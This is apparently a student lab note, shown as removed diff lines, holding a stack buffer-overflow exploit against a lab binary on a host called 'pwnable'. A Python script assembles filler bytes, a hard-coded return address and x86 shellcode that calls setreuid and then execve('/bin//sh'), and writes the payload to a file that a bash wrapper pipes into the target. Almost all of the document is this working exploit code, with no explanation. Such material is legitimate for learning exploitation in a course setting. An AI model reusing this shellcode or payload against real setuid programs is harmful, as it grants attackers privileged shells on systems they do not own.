proj1 done

proj1/note

-pwnable:~$ cat egg
-#!/bin/bash
-
-./egg3 && cat input.txt | invoke dejavu
-
-pwnable:~$ cat egg3
-#!/usr/bin/python3
-
-def fuck8(txt):
-    assert(len(txt) == 8)
-    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]
-
-def revert(txt):
-    assert(len(txt) % 8 == 0)
-    res = ""
-    for i in range(int(len(txt) / 8)):
-        res += fuck8(txt[i*8:(i+1)*8])
-    return res
-
-
-fill = "0123456789abcdef0123456789abcdef01234567"
-raddr = "bffffa50" # "bffffa50"
-#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
-shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd8000"
-
-payload = revert(fill) + revert(raddr) + (shellcode)
-print(payload)
-
-import binascii
-
-b = binascii.unhexlify(payload)
-with open('input.txt','wb+') as f:
-    f.write(b)
-